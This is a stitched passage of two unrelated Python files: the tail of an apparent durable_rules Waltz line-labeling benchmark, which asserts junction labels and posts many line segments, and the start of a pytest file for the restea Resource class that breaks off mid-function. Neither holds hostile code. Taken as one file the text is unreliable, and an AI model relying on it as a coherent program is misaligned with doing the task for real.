c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2) & (m.lid == c.i.lid),
c.el3 << (m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p3) & (m.lid == c.i.lid),
(m.t == 'stage') & (m.l == 'remove_label'))
def remove_label_3j(c):
print('checking')
c.retract_fact(c.i)
c.retract_fact(c.el1)
c.retract_fact(c.el2)
c.retract_fact(c.el3)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'checking'})
c.s.gid += 1
@when_all(c.i << (m.t == 'illegal'),
c.j << (m.t == 'junction') & (m.j_t == '2j') & (m.base_point == c.i.base_point),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1) & (m.lid == c.i.lid),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2) & (m.lid == c.i.lid),
(m.t == 'stage') & (m.l == 'remove_label'))
def remove_edge_2j(c):
print('checking')
c.retract_fact(c.i)
c.retract_fact(c.el1)
c.retract_fact(c.el2)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'checking'})
c.s.gid += 1
@when_start
def start(host):
create_and_assert(host, {'t':'label' ,'j_t':'2j' ,'name':'L' ,'lid':'1' ,'n1':'B' ,'n2':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'2j' ,'name':'L' ,'lid':'2' ,'n1':'+' ,'n2':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'2j' ,'name':'L' ,'lid':'3' ,'n1':'B' ,'n2':'+'})
create_and_assert(host, {'t':'label' ,'j_t':'2j' ,'name':'L' ,'lid':'4' ,'n1':'-' ,'n2':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'2j' ,'name':'L' ,'lid':'5' ,'n1':'B' ,'n2':'-'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'fork' ,'lid':'6' ,'n1':'+' ,'n2':'+' ,'n3':'+'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'fork' ,'lid':'7' ,'n1':'-' ,'n2':'-' ,'n3':'-'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'fork' ,'lid':'8' ,'n1':'B' ,'n2':'-' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'fork' ,'lid':'9' ,'n1':'-' ,'n2':'B' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'fork' ,'lid':'10' ,'n1':'B' ,'n2':'B' ,'n3':'-'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'tee' ,'lid':'11' ,'n1':'B' ,'n2':'+' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'tee' ,'lid':'12' ,'n1':'B' ,'n2':'-' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'tee' ,'lid':'13' ,'n1':'B' ,'n2':'B' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'arrow' ,'lid':'14' ,'n1':'B' ,'n2':'+' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'arrow' ,'lid':'15' ,'n1':'-' ,'n2':'+' ,'n3':'-'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'arrow' ,'lid':'16' ,'n1':'+' ,'n2':'-' ,'n3':'+'})
create_and_post(host, {'t':'line' ,'p1':50003 ,'p2':60003})
create_and_post(host, {'t':'line' ,'p1':30005 ,'p2':30006})
create_and_post(host, {'t':'line' ,'p1':80005 ,'p2':80006})
create_and_post(host, {'t':'line' ,'p1':50008 ,'p2':60008})
create_and_post(host, {'t':'line' ,'p1':0 ,'p2':20000})
create_and_post(host, {'t':'line' ,'p1':20000 ,'p2':30000})
create_and_post(host, {'t':'line' ,'p1':30000 ,'p2':40000})
create_and_post(host, {'t':'line' ,'p1':0 ,'p2':2})
create_and_post(host, {'t':'line' ,'p1':2 ,'p2':3})
create_and_post(host, {'t':'line' ,'p1':3 ,'p2':4})
create_and_post(host, {'t':'line' ,'p1':4 ,'p2':40004})
create_and_post(host, {'t':'line' ,'p1':40004 ,'p2':40000})
create_and_post(host, {'t':'line' ,'p1':40000 ,'p2':50001})
create_and_post(host, {'t':'line' ,'p1':50001 ,'p2':50002})
create_and_post(host, {'t':'line' ,'p1':50002 ,'p2':50003})
create_and_post(host, {'t':'line' ,'p1':50003 ,'p2':50005})
create_and_post(host, {'t':'line' ,'p1':50005 ,'p2':40004})
create_and_post(host, {'t':'line' ,'p1':50005 ,'p2':30005})
create_and_post(host, {'t':'line' ,'p1':30005 ,'p2':20005})
create_and_post(host, {'t':'line' ,'p1':20005 ,'p2':10005})
create_and_post(host, {'t':'line' ,'p1':10005 ,'p2':4})
create_and_post(host, {'t':'line' ,'p1':60000 ,'p2':80000})
create_and_post(host, {'t':'line' ,'p1':80000 ,'p2':90000})
create_and_post(host, {'t':'line' ,'p1':90000 ,'p2':100000})
create_and_post(host, {'t':'line' ,'p1':60000 ,'p2':60002})
create_and_post(host, {'t':'line' ,'p1':60002 ,'p2':60003})
create_and_post(host, {'t':'line' ,'p1':60003 ,'p2':60004})
create_and_post(host, {'t':'line' ,'p1':60004 ,'p2':100004})
create_and_post(host, {'t':'line' ,'p1':100004 ,'p2':100000})
create_and_post(host, {'t':'line' ,'p1':100000 ,'p2':110001})
create_and_post(host, {'t':'line' ,'p1':110001 ,'p2':110002})
create_and_post(host, {'t':'line' ,'p1':110002 ,'p2':110003})
create_and_post(host, {'t':'line' ,'p1':110003 ,'p2':110005})
create_and_post(host, {'t':'line' ,'p1':110005 ,'p2':100004})
create_and_post(host, {'t':'line' ,'p1':110005 ,'p2':90005})
create_and_post(host, {'t':'line' ,'p1':90005 ,'p2':80005})
create_and_post(host, {'t':'line' ,'p1':80005 ,'p2':70005})
create_and_post(host, {'t':'line' ,'p1':70005 ,'p2':60004})
create_and_post(host, {'t':'line' ,'p1':6 ,'p2':20006})
create_and_post(host, {'t':'line' ,'p1':20006 ,'p2':30006})
create_and_post(host, {'t':'line' ,'p1':30006 ,'p2':40006})
create_and_post(host, {'t':'line' ,'p1':6 ,'p2':8})
create_and_post(host, {'t':'line' ,'p1':8 ,'p2':9})
create_and_post(host, {'t':'line' ,'p1':9 ,'p2':10})
create_and_post(host, {'t':'line' ,'p1':10 ,'p2':40010})
create_and_post(host, {'t':'line' ,'p1':40010 ,'p2':40006})
create_and_post(host, {'t':'line' ,'p1':40006 ,'p2':50007})
create_and_post(host, {'t':'line' ,'p1':50007 ,'p2':50008})
create_and_post(host, {'t':'line' ,'p1':50008 ,'p2':50009})
create_and_post(host, {'t':'line' ,'p1':50009 ,'p2':50011})
create_and_post(host, {'t':'line' ,'p1':50011 ,'p2':40010})
create_and_post(host, {'t':'line' ,'p1':50011 ,'p2':30011})
create_and_post(host, {'t':'line' ,'p1':30011 ,'p2':20011})
create_and_post(host, {'t':'line' ,'p1':20011 ,'p2':10011})
create_and_post(host, {'t':'line' ,'p1':10011 ,'p2':10})
create_and_post(host, {'t':'line' ,'p1':60006 ,'p2':80006})
create_and_post(host, {'t':'line' ,'p1':80006 ,'p2':90006})
create_and_post(host, {'t':'line' ,'p1':90006 ,'p2':100006})
create_and_post(host, {'t':'line' ,'p1':60006 ,'p2':60008})
create_and_post(host, {'t':'line' ,'p1':60008 ,'p2':60009})
create_and_post(host, {'t':'line' ,'p1':60009 ,'p2':60010})
create_and_post(host, {'t':'line' ,'p1':60010 ,'p2':100010})
create_and_post(host, {'t':'line' ,'p1':100010 ,'p2':100006})
create_and_post(host, {'t':'line' ,'p1':100006 ,'p2':110007})
create_and_post(host, {'t':'line' ,'p1':110007 ,'p2':110008})
create_and_post(host, {'t':'line' ,'p1':110008 ,'p2':110009})
create_and_post(host, {'t':'line' ,'p1':110009 ,'p2':110011})
create_and_post(host, {'t':'line' ,'p1':110011 ,'p2':100010})
create_and_post(host, {'t':'line' ,'p1':110011 ,'p2':90011})
create_and_post(host, {'t':'line' ,'p1':90011 ,'p2':80011})
create_and_post(host, {'t':'line' ,'p1':80011 ,'p2':70011})
create_and_post(host, {'t':'line' ,'p1':70011 ,'p2':60010})
create_and_post(host, {'t':'line' ,'p1':170003 ,'p2':180003})
create_and_post(host, {'t':'line' ,'p1':150005 ,'p2':150006})
create_and_post(host, {'t':'line' ,'p1':200005 ,'p2':200006})
create_and_post(host, {'t':'line' ,'p1':170008 ,'p2':180008})
create_and_post(host, {'t':'line' ,'p1':120000 ,'p2':140000})
create_and_post(host, {'t':'line' ,'p1':140000 ,'p2':150000})
create_and_post(host, {'t':'line' ,'p1':150000 ,'p2':160000})
create_and_post(host, {'t':'line' ,'p1':120000 ,'p2':120002})
create_and_post(host, {'t':'line' ,'p1':120002 ,'p2':120003})
create_and_post(host, {'t':'line' ,'p1':120003 ,'p2':120004})
create_and_post(host, {'t':'line' ,'p1':120004 ,'p2':160004})
create_and_post(host, {'t':'line' ,'p1':160004 ,'p2':160000})
create_and_post(host, {'t':'line' ,'p1':160000 ,'p2':170001})
create_and_post(host, {'t':'line' ,'p1':170001 ,'p2':170002})
create_and_post(host, {'t':'line' ,'p1':170002 ,'p2':170003})
create_and_post(host, {'t':'line' ,'p1':170003 ,'p2':170005})
create_and_post(host, {'t':'line' ,'p1':170005 ,'p2':160004})
create_and_post(host, {'t':'line' ,'p1':170005 ,'p2':150005})
create_and_post(host, {'t':'line' ,'p1':150005 ,'p2':140005})
create_and_post(host, {'t':'line' ,'p1':140005 ,'p2':130005})
create_and_post(host, {'t':'line' ,'p1':130005 ,'p2':120004})
create_and_post(host, {'t':'line' ,'p1':180000 ,'p2':200000})
create_and_post(host, {'t':'line' ,'p1':200000 ,'p2':210000})
create_and_post(host, {'t':'line' ,'p1':210000 ,'p2':220000})
create_and_post(host, {'t':'line' ,'p1':180000 ,'p2':180002})
create_and_post(host, {'t':'line' ,'p1':180002 ,'p2':180003})
create_and_post(host, {'t':'line' ,'p1':180003 ,'p2':180004})
create_and_post(host, {'t':'line' ,'p1':180004 ,'p2':220004})
create_and_post(host, {'t':'line' ,'p1':220004 ,'p2':220000})
create_and_post(host, {'t':'line' ,'p1':220000 ,'p2':230001})
create_and_post(host, {'t':'line' ,'p1':230001 ,'p2':230002})
create_and_post(host, {'t':'line' ,'p1':230002 ,'p2':230003})
create_and_post(host, {'t':'line' ,'p1':230003 ,'p2':230005})
create_and_post(host, {'t':'line' ,'p1':230005 ,'p2':220004})
create_and_post(host, {'t':'line' ,'p1':230005 ,'p2':210005})
create_and_post(host, {'t':'line' ,'p1':210005 ,'p2':200005})
create_and_post(host, {'t':'line' ,'p1':200005 ,'p2':190005})
create_and_post(host, {'t':'line' ,'p1':190005 ,'p2':180004})
create_and_post(host, {'t':'line' ,'p1':120006 ,'p2':140006})
create_and_post(host, {'t':'line' ,'p1':140006 ,'p2':150006})
create_and_post(host, {'t':'line' ,'p1':150006 ,'p2':160006})
create_and_post(host, {'t':'line' ,'p1':120006 ,'p2':120008})
create_and_post(host, {'t':'line' ,'p1':120008 ,'p2':120009})
create_and_post(host, {'t':'line' ,'p1':120009 ,'p2':120010})
create_and_post(host, {'t':'line' ,'p1':120010 ,'p2':160010})
create_and_post(host, {'t':'line' ,'p1':160010 ,'p2':160006})
create_and_post(host, {'t':'line' ,'p1':160006 ,'p2':170007})
create_and_post(host, {'t':'line' ,'p1':170007 ,'p2':170008})
create_and_post(host, {'t':'line' ,'p1':170008 ,'p2':170009})
create_and_post(host, {'t':'line' ,'p1':170009 ,'p2':170011})
create_and_post(host, {'t':'line' ,'p1':170011 ,'p2':160010})
create_and_post(host, {'t':'line' ,'p1':170011 ,'p2':150011})
create_and_post(host, {'t':'line' ,'p1':150011 ,'p2':140011})
create_and_post(host, {'t':'line' ,'p1':140011 ,'p2':130011})
create_and_post(host, {'t':'line' ,'p1':130011 ,'p2':120010})
create_and_post(host, {'t':'line' ,'p1':180006 ,'p2':200006})
create_and_post(host, {'t':'line' ,'p1':200006 ,'p2':210006})
create_and_post(host, {'t':'line' ,'p1':210006 ,'p2':220006})
create_and_post(host, {'t':'line' ,'p1':180006 ,'p2':180008})
create_and_post(host, {'t':'line' ,'p1':180008 ,'p2':180009})
create_and_post(host, {'t':'line' ,'p1':180009 ,'p2':180010})
create_and_post(host, {'t':'line' ,'p1':180010 ,'p2':220010})
create_and_post(host, {'t':'line' ,'p1':220010 ,'p2':220006})
create_and_post(host, {'t':'line' ,'p1':220006 ,'p2':230007})
create_and_post(host, {'t':'line' ,'p1':230007 ,'p2':230008})
create_and_post(host, {'t':'line' ,'p1':230008 ,'p2':230009})
create_and_post(host, {'t':'line' ,'p1':230009 ,'p2':230011})
create_and_post(host, {'t':'line' ,'p1':230011 ,'p2':220010})
create_and_post(host, {'t':'line' ,'p1':230011 ,'p2':210011})
create_and_post(host, {'t':'line' ,'p1':210011 ,'p2':200011})
create_and_post(host, {'t':'line' ,'p1':200011 ,'p2':190011})
create_and_post(host, {'t':'line' ,'p1':190011 ,'p2':180010})
create_and_post(host, {'t':'line' ,'p1':110003 ,'p2':120003})
create_and_post(host, {'t':'line' ,'p1':90005 ,'p2':90006})
create_and_post(host, {'t':'line' ,'p1':140005 ,'p2':140006})
create_and_post(host, {'t':'line' ,'p1':110008 ,'p2':120008})
create_and_post(host, {'t':'line' ,'p1':290003 ,'p2':300003})
create_and_post(host, {'t':'line' ,'p1':270005 ,'p2':270006})
create_and_post(host, {'t':'line' ,'p1':320005 ,'p2':320006})
create_and_post(host, {'t':'line' ,'p1':290008 ,'p2':300008})
create_and_post(host, {'t':'line' ,'p1':240000 ,'p2':260000})
create_and_post(host, {'t':'line' ,'p1':260000 ,'p2':270000})
create_and_post(host, {'t':'line' ,'p1':270000 ,'p2':280000})
create_and_post(host, {'t':'line' ,'p1':240000 ,'p2':240002})
create_and_post(host, {'t':'line' ,'p1':240002 ,'p2':240003})
create_and_post(host, {'t':'line' ,'p1':240003 ,'p2':240004})
create_and_post(host, {'t':'line' ,'p1':240004 ,'p2':280004})
create_and_post(host, {'t':'line' ,'p1':280004 ,'p2':280000})
create_and_post(host, {'t':'line' ,'p1':280000 ,'p2':290001})
create_and_post(host, {'t':'line' ,'p1':290001 ,'p2':290002})
create_and_post(host, {'t':'line' ,'p1':290002 ,'p2':290003})
create_and_post(host, {'t':'line' ,'p1':290003 ,'p2':290005})
create_and_post(host, {'t':'line' ,'p1':290005 ,'p2':280004})
create_and_post(host, {'t':'line' ,'p1':290005 ,'p2':270005})
create_and_post(host, {'t':'line' ,'p1':270005 ,'p2':260005})
create_and_post(host, {'t':'line' ,'p1':260005 ,'p2':250005})
create_and_post(host, {'t':'line' ,'p1':250005 ,'p2':240004})
create_and_post(host, {'t':'line' ,'p1':300000 ,'p2':320000})
create_and_post(host, {'t':'line' ,'p1':320000 ,'p2':330000})
create_and_post(host, {'t':'line' ,'p1':330000 ,'p2':340000})
create_and_post(host, {'t':'line' ,'p1':300000 ,'p2':300002})
create_and_post(host, {'t':'line' ,'p1':300002 ,'p2':300003})
create_and_post(host, {'t':'line' ,'p1':300003 ,'p2':300004})
create_and_post(host, {'t':'line' ,'p1':300004 ,'p2':340004})
create_and_post(host, {'t':'line' ,'p1':340004 ,'p2':340000})
create_and_post(host, {'t':'line' ,'p1':340000 ,'p2':350001})
create_and_post(host, {'t':'line' ,'p1':350001 ,'p2':350002})
create_and_post(host, {'t':'line' ,'p1':350002 ,'p2':350003})
create_and_post(host, {'t':'line' ,'p1':350003 ,'p2':350005})
create_and_post(host, {'t':'line' ,'p1':350005 ,'p2':340004})
create_and_post(host, {'t':'line' ,'p1':350005 ,'p2':330005})
create_and_post(host, {'t':'line' ,'p1':330005 ,'p2':320005})
create_and_post(host, {'t':'line' ,'p1':320005 ,'p2':310005})
create_and_post(host, {'t':'line' ,'p1':310005 ,'p2':300004})
create_and_post(host, {'t':'line' ,'p1':240006 ,'p2':260006})
create_and_post(host, {'t':'line' ,'p1':260006 ,'p2':270006})
create_and_post(host, {'t':'line' ,'p1':270006 ,'p2':280006})
create_and_post(host, {'t':'line' ,'p1':240006 ,'p2':240008})
create_and_post(host, {'t':'line' ,'p1':240008 ,'p2':240009})
create_and_post(host, {'t':'line' ,'p1':240009 ,'p2':240010})
create_and_post(host, {'t':'line' ,'p1':240010 ,'p2':280010})
create_and_post(host, {'t':'line' ,'p1':280010 ,'p2':280006})
create_and_post(host, {'t':'line' ,'p1':280006 ,'p2':290007})
create_and_post(host, {'t':'line' ,'p1':290007 ,'p2':290008})
create_and_post(host, {'t':'line' ,'p1':290008 ,'p2':290009})
create_and_post(host, {'t':'line' ,'p1':290009 ,'p2':290011})
create_and_post(host, {'t':'line' ,'p1':290011 ,'p2':280010})
create_and_post(host, {'t':'line' ,'p1':290011 ,'p2':270011})
create_and_post(host, {'t':'line' ,'p1':270011 ,'p2':260011})
create_and_post(host, {'t':'line' ,'p1':260011 ,'p2':250011})
create_and_post(host, {'t':'line' ,'p1':250011 ,'p2':240010})
create_and_post(host, {'t':'line' ,'p1':300006 ,'p2':320006})
create_and_post(host, {'t':'line' ,'p1':320006 ,'p2':330006})
create_and_post(host, {'t':'line' ,'p1':330006 ,'p2':340006})
create_and_post(host, {'t':'line' ,'p1':300006 ,'p2':300008})
create_and_post(host, {'t':'line' ,'p1':300008 ,'p2':300009})
create_and_post(host, {'t':'line' ,'p1':300009 ,'p2':300010})
create_and_post(host, {'t':'line' ,'p1':300010 ,'p2':340010})
create_and_post(host, {'t':'line' ,'p1':340010 ,'p2':340006})
create_and_post(host, {'t':'line' ,'p1':340006 ,'p2':350007})
create_and_post(host, {'t':'line' ,'p1':350007 ,'p2':350008})
create_and_post(host, {'t':'line' ,'p1':350008 ,'p2':350009})
create_and_post(host, {'t':'line' ,'p1':350009 ,'p2':350011})
create_and_post(host, {'t':'line' ,'p1':350011 ,'p2':340010})
create_and_post(host, {'t':'line' ,'p1':350011 ,'p2':330011})
create_and_post(host, {'t':'line' ,'p1':330011 ,'p2':320011})
create_and_post(host, {'t':'line' ,'p1':320011 ,'p2':310011})
create_and_post(host, {'t':'line' ,'p1':310011 ,'p2':300010})
create_and_post(host, {'t':'line' ,'p1':230003 ,'p2':240003})
create_and_post(host, {'t':'line' ,'p1':210005 ,'p2':210006})
create_and_post(host, {'t':'line' ,'p1':260005 ,'p2':260006})
create_and_post(host, {'t':'line' ,'p1':230008 ,'p2':240008})
create_and_post(host, {'t':'line' ,'p1':410003 ,'p2':420003})
create_and_post(host, {'t':'line' ,'p1':390005 ,'p2':390006})
create_and_post(host, {'t':'line' ,'p1':440005 ,'p2':440006})
create_and_post(host, {'t':'line' ,'p1':410008 ,'p2':420008})
create_and_post(host, {'t':'line' ,'p1':360000 ,'p2':380000})
create_and_post(host, {'t':'line' ,'p1':380000 ,'p2':390000})
create_and_post(host, {'t':'line' ,'p1':390000 ,'p2':400000})
create_and_post(host, {'t':'line' ,'p1':360000 ,'p2':360002})
create_and_post(host, {'t':'line' ,'p1':360002 ,'p2':360003})
create_and_post(host, {'t':'line' ,'p1':360003 ,'p2':360004})
create_and_post(host, {'t':'line' ,'p1':360004 ,'p2':400004})
create_and_post(host, {'t':'line' ,'p1':400004 ,'p2':400000})
create_and_post(host, {'t':'line' ,'p1':400000 ,'p2':410001})
create_and_post(host, {'t':'line' ,'p1':410001 ,'p2':410002})
create_and_post(host, {'t':'line' ,'p1':410002 ,'p2':410003})
create_and_post(host, {'t':'line' ,'p1':410003 ,'p2':410005})
create_and_post(host, {'t':'line' ,'p1':410005 ,'p2':400004})
create_and_post(host, {'t':'line' ,'p1':410005 ,'p2':390005})
create_and_post(host, {'t':'line' ,'p1':390005 ,'p2':380005})
create_and_post(host, {'t':'line' ,'p1':380005 ,'p2':370005})
create_and_post(host, {'t':'line' ,'p1':370005 ,'p2':360004})
create_and_post(host, {'t':'line' ,'p1':420000 ,'p2':440000})
create_and_post(host, {'t':'line' ,'p1':440000 ,'p2':450000})
create_and_post(host, {'t':'line' ,'p1':450000 ,'p2':460000})
create_and_post(host, {'t':'line' ,'p1':420000 ,'p2':420002})
create_and_post(host, {'t':'line' ,'p1':420002 ,'p2':420003})
create_and_post(host, {'t':'line' ,'p1':420003 ,'p2':420004})
create_and_post(host, {'t':'line' ,'p1':420004 ,'p2':460004})
create_and_post(host, {'t':'line' ,'p1':460004 ,'p2':460000})
create_and_post(host, {'t':'line' ,'p1':460000 ,'p2':470001})
create_and_post(host, {'t':'line' ,'p1':470001 ,'p2':470002})
create_and_post(host, {'t':'line' ,'p1':470002 ,'p2':470003})
create_and_post(host, {'t':'line' ,'p1':470003 ,'p2':470005})
create_and_post(host, {'t':'line' ,'p1':470005 ,'p2':460004})
create_and_post(host, {'t':'line' ,'p1':470005 ,'p2':450005})
create_and_post(host, {'t':'line' ,'p1':450005 ,'p2':440005})
create_and_post(host, {'t':'line' ,'p1':440005 ,'p2':430005})
create_and_post(host, {'t':'line' ,'p1':430005 ,'p2':420004})
create_and_post(host, {'t':'line' ,'p1':360006 ,'p2':380006})
create_and_post(host, {'t':'line' ,'p1':380006 ,'p2':390006})
create_and_post(host, {'t':'line' ,'p1':390006 ,'p2':400006})
create_and_post(host, {'t':'line' ,'p1':360006 ,'p2':360008})
create_and_post(host, {'t':'line' ,'p1':360008 ,'p2':360009})
create_and_post(host, {'t':'line' ,'p1':360009 ,'p2':360010})
create_and_post(host, {'t':'line' ,'p1':360010 ,'p2':400010})
create_and_post(host, {'t':'line' ,'p1':400010 ,'p2':400006})
create_and_post(host, {'t':'line' ,'p1':400006 ,'p2':410007})
create_and_post(host, {'t':'line' ,'p1':410007 ,'p2':410008})
create_and_post(host, {'t':'line' ,'p1':410008 ,'p2':410009})
create_and_post(host, {'t':'line' ,'p1':410009 ,'p2':410011})
create_and_post(host, {'t':'line' ,'p1':410011 ,'p2':400010})
create_and_post(host, {'t':'line' ,'p1':410011 ,'p2':390011})
create_and_post(host, {'t':'line' ,'p1':390011 ,'p2':380011})
create_and_post(host, {'t':'line' ,'p1':380011 ,'p2':370011})
create_and_post(host, {'t':'line' ,'p1':370011 ,'p2':360010})
create_and_post(host, {'t':'line' ,'p1':420006 ,'p2':440006})
create_and_post(host, {'t':'line' ,'p1':440006 ,'p2':450006})
create_and_post(host, {'t':'line' ,'p1':450006 ,'p2':460006})
create_and_post(host, {'t':'line' ,'p1':420006 ,'p2':420008})
create_and_post(host, {'t':'line' ,'p1':420008 ,'p2':420009})
create_and_post(host, {'t':'line' ,'p1':420009 ,'p2':420010})
create_and_post(host, {'t':'line' ,'p1':420010 ,'p2':460010})
create_and_post(host, {'t':'line' ,'p1':460010 ,'p2':460006})
create_and_post(host, {'t':'line' ,'p1':460006 ,'p2':470007})
create_and_post(host, {'t':'line' ,'p1':470007 ,'p2':470008})
create_and_post(host, {'t':'line' ,'p1':470008 ,'p2':470009})
create_and_post(host, {'t':'line' ,'p1':470009 ,'p2':470011})
create_and_post(host, {'t':'line' ,'p1':470011 ,'p2':460010})
create_and_post(host, {'t':'line' ,'p1':470011 ,'p2':450011})
create_and_post(host, {'t':'line' ,'p1':450011 ,'p2':440011})
create_and_post(host, {'t':'line' ,'p1':440011 ,'p2':430011})
create_and_post(host, {'t':'line' ,'p1':430011 ,'p2':420010})
create_and_post(host, {'t':'line' ,'p1':350003 ,'p2':360003})
create_and_post(host, {'t':'line' ,'p1':330005 ,'p2':330006})
create_and_post(host, {'t':'line' ,'p1':380005 ,'p2':380006})
create_and_post(host, {'t':'line' ,'p1':350008 ,'p2':360008})
create_and_post(host, {'t':'line' ,'p1':530003 ,'p2':540003})
create_and_post(host, {'t':'line' ,'p1':510005 ,'p2':510006})
create_and_post(host, {'t':'line' ,'p1':560005 ,'p2':560006})
create_and_post(host, {'t':'line' ,'p1':530008 ,'p2':540008})
create_and_post(host, {'t':'line' ,'p1':480000 ,'p2':500000})
create_and_post(host, {'t':'line' ,'p1':500000 ,'p2':510000})
create_and_post(host, {'t':'line' ,'p1':510000 ,'p2':520000})
create_and_post(host, {'t':'line' ,'p1':480000 ,'p2':480002})
create_and_post(host, {'t':'line' ,'p1':480002 ,'p2':480003})
create_and_post(host, {'t':'line' ,'p1':480003 ,'p2':480004})
create_and_post(host, {'t':'line' ,'p1':480004 ,'p2':520004})
create_and_post(host, {'t':'line' ,'p1':520004 ,'p2':520000})
create_and_post(host, {'t':'line' ,'p1':520000 ,'p2':530001})
create_and_post(host, {'t':'line' ,'p1':530001 ,'p2':530002})
create_and_post(host, {'t':'line' ,'p1':530002 ,'p2':530003})
create_and_post(host, {'t':'line' ,'p1':530003 ,'p2':530005})
create_and_post(host, {'t':'line' ,'p1':530005 ,'p2':520004})
create_and_post(host, {'t':'line' ,'p1':530005 ,'p2':510005})
create_and_post(host, {'t':'line' ,'p1':510005 ,'p2':500005})
create_and_post(host, {'t':'line' ,'p1':500005 ,'p2':490005})
create_and_post(host, {'t':'line' ,'p1':490005 ,'p2':480004})
create_and_post(host, {'t':'line' ,'p1':540000 ,'p2':560000})
create_and_post(host, {'t':'line' ,'p1':560000 ,'p2':570000})
create_and_post(host, {'t':'line' ,'p1':570000 ,'p2':580000})
create_and_post(host, {'t':'line' ,'p1':540000 ,'p2':540002})
create_and_post(host, {'t':'line' ,'p1':540002 ,'p2':540003})
create_and_post(host, {'t':'line' ,'p1':540003 ,'p2':540004})
create_and_post(host, {'t':'line' ,'p1':540004 ,'p2':580004})
create_and_post(host, {'t':'line' ,'p1':580004 ,'p2':580000})
create_and_post(host, {'t':'line' ,'p1':580000 ,'p2':590001})
create_and_post(host, {'t':'line' ,'p1':590001 ,'p2':590002})
create_and_post(host, {'t':'line' ,'p1':590002 ,'p2':590003})
create_and_post(host, {'t':'line' ,'p1':590003 ,'p2':590005})
create_and_post(host, {'t':'line' ,'p1':590005 ,'p2':580004})
create_and_post(host, {'t':'line' ,'p1':590005 ,'p2':570005})
create_and_post(host, {'t':'line' ,'p1':570005 ,'p2':560005})
create_and_post(host, {'t':'line' ,'p1':560005 ,'p2':550005})
create_and_post(host, {'t':'line' ,'p1':550005 ,'p2':540004})
create_and_post(host, {'t':'line' ,'p1':480006 ,'p2':500006})
create_and_post(host, {'t':'line' ,'p1':500006 ,'p2':510006})
create_and_post(host, {'t':'line' ,'p1':510006 ,'p2':520006})
create_and_post(host, {'t':'line' ,'p1':480006 ,'p2':480008})
create_and_post(host, {'t':'line' ,'p1':480008 ,'p2':480009})
create_and_post(host, {'t':'line' ,'p1':480009 ,'p2':480010})
create_and_post(host, {'t':'line' ,'p1':480010 ,'p2':520010})
create_and_post(host, {'t':'line' ,'p1':520010 ,'p2':520006})
create_and_post(host, {'t':'line' ,'p1':520006 ,'p2':530007})
create_and_post(host, {'t':'line' ,'p1':530007 ,'p2':530008})
create_and_post(host, {'t':'line' ,'p1':530008 ,'p2':530009})
create_and_post(host, {'t':'line' ,'p1':530009 ,'p2':530011})
create_and_post(host, {'t':'line' ,'p1':530011 ,'p2':520010})
create_and_post(host, {'t':'line' ,'p1':530011 ,'p2':510011})
create_and_post(host, {'t':'line' ,'p1':510011 ,'p2':500011})
create_and_post(host, {'t':'line' ,'p1':500011 ,'p2':490011})
create_and_post(host, {'t':'line' ,'p1':490011 ,'p2':480010})
create_and_post(host, {'t':'line' ,'p1':540006 ,'p2':560006})
create_and_post(host, {'t':'line' ,'p1':560006 ,'p2':570006})
create_and_post(host, {'t':'line' ,'p1':570006 ,'p2':580006})
create_and_post(host, {'t':'line' ,'p1':540006 ,'p2':540008})
create_and_post(host, {'t':'line' ,'p1':540008 ,'p2':540009})
create_and_post(host, {'t':'line' ,'p1':540009 ,'p2':540010})
create_and_post(host, {'t':'line' ,'p1':540010 ,'p2':580010})
create_and_post(host, {'t':'line' ,'p1':580010 ,'p2':580006})
create_and_post(host, {'t':'line' ,'p1':580006 ,'p2':590007})
create_and_post(host, {'t':'line' ,'p1':590007 ,'p2':590008})
create_and_post(host, {'t':'line' ,'p1':590008 ,'p2':590009})
create_and_post(host, {'t':'line' ,'p1':590009 ,'p2':590011})
create_and_post(host, {'t':'line' ,'p1':590011 ,'p2':580010})
create_and_post(host, {'t':'line' ,'p1':590011 ,'p2':570011})
create_and_post(host, {'t':'line' ,'p1':570011 ,'p2':560011})
create_and_post(host, {'t':'line' ,'p1':560011 ,'p2':550011})
create_and_post(host, {'t':'line' ,'p1':550011 ,'p2':540010})
create_and_post(host, {'t':'line' ,'p1':470003 ,'p2':480003})
create_and_post(host, {'t':'line' ,'p1':450005 ,'p2':450006})
create_and_post(host, {'t':'line' ,'p1':500005 ,'p2':500006})
create_and_post(host, {'t':'line' ,'p1':470008 ,'p2':480008})
host.assert_fact('waltzdb', {'t':'stage', 'l':'duplicate', 'sid': 1, 'id': 999})
host.patch_state('waltzdb', {'sid': 1, 'gid': 1000, 'start_time': unix_time_millis(datetime.datetime.now())})
run_all(['/tmp/redis0.sock'])
| |
import collections
import json
import mock
import pytest
from mock import patch
from restea import errors
from restea import formats
from restea import fields
from restea.resource import Resource
def create_resource_helper(
method='GET',
headers={},
data=None,
formatter=None
):
request = mock.Mock(method=method, headers=headers, data=data)
if not formatter:
formatter = mock.Mock()
return Resource(request, formatter), request, formatter
def test_init():
resource, req_mock, formatter_mock = create_resource_helper()
assert resource.request == req_mock
assert resource.formatter == formatter_mock
assert isinstance(resource.fields, fields.FieldSet)
def test_get_method_name_list():
resource, _, _ = create_resource_helper()
assert 'list' == resource._get_method_name(has_iden=False)
def test_get_method_name_show():
resource, _, _ = create_resource_helper()
assert 'show' == resource._get_method_name(has_iden=True)
def test_get_method_name_edit():
